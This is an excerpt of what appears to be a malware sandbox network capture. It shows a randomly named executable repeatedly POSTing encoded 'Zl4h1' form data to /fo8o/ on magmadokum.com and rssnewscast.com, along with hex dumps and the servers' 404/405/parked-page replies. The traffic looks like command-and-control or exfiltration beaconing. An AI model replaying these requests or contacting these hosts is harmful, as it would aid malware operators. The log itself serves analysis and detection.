                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.magmadokum.com
                                                    Origin: http://www.magmadokum.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.magmadokum.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 31 32 44 45 63 4c 46 49 4e 79 75 75 52 42 67 2b 61 39 5a 5a 74 71 37 63 54 53 53 41 48 58 4c 67 73 77 3d 3d
                                                    Data Ascii: Zl4h1=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12DEcLFINyuuRBg+a9ZZtq7cTSSAHXLgsw==
                                                    Jun 9, 2024 18:00:49.939908028 CEST225INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:49 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 17
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:50.2799408Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.114972685.159.66.93806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:51.502248049 CEST796OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.magmadokum.com
                                                    Origin: http://www.magmadokum.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.magmadokum.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 7a 65 48 30 7a 77 4f 6d 75 70 33 31 34 55 71 54 34 6a 79 43 75 7a 6d 56 36 4b 2b 6f 68 44 4d 49 4d 3d
                                                    Data Ascii: Zl4h1=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeH0zwOmup314UqT4jyCuzmV6K+ohDMIM=
                                                    Jun 9, 2024 18:00:52.463092089 CEST225INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:52 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 18
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.114972785.159.66.93806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:54.035046101 CEST1809OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.magmadokum.com
                                                    Origin: http://www.magmadokum.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.magmadokum.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 51 55 37 2b 54 57 4b 46 33 48 63 2b 76 79 6b 31 69 48 2b 48 36 47 4c 46 69 4a 4a 63 66 73 72 2b 61 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 4d 4f 73 39 47 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED]
                                                    Data Ascii: Zl4h1=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpQU7+TWKF3Hc+vyk1iH+H6GLFiJJcfsr+aUYwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JMOs9GQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRrSPONduHl5ua2VubEsxTtqVVH0/4C93V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSsh3qQ/+zYWCggo0HSgiKCGAK3NodetOURwV1Y224AoreqXUxyDj2JA5VDFUgsp4A5JscT8SWC4+biRmOZlg90J4zHkuZGCDX/OgbL0HKZn+KCvfyiWDbtQv9gp8Jju7TYaJ8HofdF2QLrpPrL/Fe2SuzB9o46MSwPjGa2uk4PtUJiUmEDqFnt/WcVEX5W4NWWW+fqznG4V2cpTncJnuVkZqIUAW0kcV/x11C5BnIK285v2Ir8CiIXtQAG0ZGDO7oFuOr9rhjeM6mR+oq6dmtr9+xpx8+2STcErHIpzgX/Ymo8XfCMuxasxpCVIo1rQ143JpeS4mEcGOSvP2m23pdUKGAckPZwegIbpHpBCRxBs4pcXGW5AuNPs8tRkDTNdYWS7kbToUJVRTJfSsVJeSHKy2DKJJw50U05j8bczUr/6Da+4uG6mYo1E8px+qFDnEDEz47AZulJO5nkTG0PhCLqHBkghAaecpadgpcHbUgbJZebV+X6KnYAN9pWt2WViVWO4kag3k2Rc8Fw [TRUNCATED]
                                                    Jun 9, 2024 18:00:54.995521069 CEST225INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:54 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 17
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.114972885.159.66.93806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:56.564965010 CEST506OUTGET /fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.magmadokum.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:00:57.476320028 CEST225INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:57 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 18
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:57.8280283Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.114972991.195.240.94806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:02.682894945 CEST779OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.rssnewscast.com
                                                    Origin: http://www.rssnewscast.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 39 46 61 74 63 44 39 67 59 42 79 74 58 32 73 78 69 75 46 53 37 77 7a 77 5a 4a 63 54 72 68 51 67 3d 3d
                                                    Data Ascii: Zl4h1=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o99FatcD9gYBytX2sxiuFS7wzwZJcTrhQg==
                                                    Jun 9, 2024 18:01:03.534750938 CEST707INHTTP/1.1 405 Not Allowed
                                                    date: Sun, 09 Jun 2024 16:01:03 GMT
                                                    content-type: text/html
                                                    content-length: 556
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.114973091.195.240.94806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:05.225583076 CEST799OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.rssnewscast.com
                                                    Origin: http://www.rssnewscast.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 7a 79 6e 57 34 35 56 69 4f 6f 4c 68 64 68 6d 61 43 37 71 4a 50 53 7a 67 32 50 4c 32 79 62 34 51 38 3d
                                                    Data Ascii: Zl4h1=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBzynW45ViOoLhdhmaC7qJPSzg2PL2yb4Q8=
                                                    Jun 9, 2024 18:01:06.085066080 CEST707INHTTP/1.1 405 Not Allowed
                                                    date: Sun, 09 Jun 2024 16:01:05 GMT
                                                    content-type: text/html
                                                    content-length: 556
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.114973191.195.240.94806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:07.752844095 CEST1812OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.rssnewscast.com
                                                    Origin: http://www.rssnewscast.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 6c 48 6f 6c 65 44 6d 75 4b 79 67 64 33 61 75 7a 31 66 75 45 79 69 76 6e 59 69 4f 6d 6c 77 4e 56 45 4f 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 39 73 77 44 61 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 [TRUNCATED]
                                                    Data Ascii: Zl4h1=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gYQ3TlHoleDmuKygd3auz1fuEyivnYiOmlwNVEOhO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK9swDaayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdGN+HqOOAs4KIirg6C1Qh2UiW7Ku3dm4PkACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iRIEQuVN9gDrCMl9SEHpfQZOEUuYvAq6bUcuPOtdXMDP4PWGWLpPueQ0+W5jBVx3f+EIBo7OZgD7ZMkn7f9Nbm9eu90DMSUAQ2BtA31dhVkUrzNCp0mxP4Ebm2czPEXIRy81Zrr+Rc/CTZBMZwVdCGDUyfmKEZ1QBeMWLlD23IRN9K+q1mZ6xUNtFuQvT+fm2XS5KV8bH2o/A/N6vMOjLPKYdIU9yGE9dWvkEWsjueUwnXV4wD4XTriK/9Gkg88Iajs+fEb6nW3Et6MIM9s8pOiPvvosN5q9yA8nc/xPUAb8XUR2FgEMpDsFjVo7IhFwyqS2m6kh5kAUO6Inh6DkkGhGM4gDzJ85yo/fSmRYi3Sby1s8H6iLEa6WmrFHU9mZO+m6sibQ9s7N/QUgS1Q0p0nQ9hcp6K+obD3X7xvd+Kn5yPiht9vw8m8sx26nUNShehJWGISC2Z6mGnsLbCrhv1cil80tfgqsZXQq7w2kHZyJiZ3mplvFP3Zoek/QdvEQzaqR9snSLE60K [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.114973291.195.240.94806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:10.287750006 CEST507OUTGET /fo8o/?Zl4h1=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.rssnewscast.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:01:11.175139904 CEST1236INHTTP/1.1 200 OK
                                                    date: Sun, 09 Jun 2024 16:01:11 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    transfer-encoding: chunked
                                                    vary: Accept-Encoding
                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    pragma: no-cache
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UTC1KbQvDnBXOxP977o4eDiYjJxVkTrMz1KgVM4nmGCKy3HNEyC2jJQqk8cOymyieXG1d6ypKElJvltgnULZpQ==
                                                    last-modified: Sun, 09 Jun 2024 16:01:11 GMT
                                                    x-cache-miss-from: parking-7dd9875bc6-z8kst
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 55 54 43 31 4b 62 51 76 44 6e 42 58 4f 78 50 39 37 37 6f 34 65 44 69 59 6a 4a 78 56 6b 54 72 4d 7a 31 4b 67 56 4d 34 6e 6d 47 43 4b 79 33 48 4e 45 79 43 32 6a 4a 51 71 6b 38 63 4f 79 6d 79 69 65 58 47 31 64 36 79 70 4b 45 6c 4a 76 6c 74 67 6e 55 4c 5a 70 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
